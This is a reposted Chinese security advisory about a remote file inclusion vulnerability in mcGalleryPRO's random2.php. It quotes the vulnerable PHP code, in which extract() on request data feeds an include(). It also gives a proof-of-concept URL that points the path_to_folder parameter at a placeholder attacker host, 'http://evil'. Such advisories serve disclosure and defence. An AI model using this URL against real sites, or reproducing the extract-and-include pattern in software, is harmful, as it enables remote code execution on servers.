[转载]MCGalleryPRO random2.php远程文件包含漏洞

信息来源：绿盟科技

MCGalleryPRO random2.php远程文件包含漏洞

发布日期：2006-09-10
更新日期：2006-09-12

受影响系统：
mcGalleryPRO mcGalleryPRO 2006
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 19936

mcGalleryPRO是一款图片收藏管理程序。

mcGalleryPRO的random2.php文件没有正确过滤对path_to_folder参数的输入，允许攻击者通过包含本地或外部资源的任意文件执行PHP代码。

random2.php中有漏洞的代码如下：

if (!empty($_SERVER)) { extract($_SERVER, EXTR_OVERWRITE); }
if (!empty($_GET)) { extract($_GET, EXTR_OVERWRITE); }
if (!empty($_POST)) { extract($_POST, EXTR_OVERWRITE); }
if (!empty($_COOKIE)) { extract($_COOKIE, EXTR_OVERWRITE); }
if (!empty($_SESSION)) { extract($_SESSION, EXTR_OVERWRITE); }

include ("$path_to_folder/admin/common.php");
include ("$path_to_folder/lang/$lang_def");

<*来源：Solpot （chris_hasibuan@yahoo.com）
  
  链接：http://secunia.com/advisories/21850/
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://somehost/path_to_mcgaller ... _folder=http://evil

建议：
--------------------------------------------------------------------------------
厂商补丁：

mcGalleryPRO
------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://mcgallerypro.com/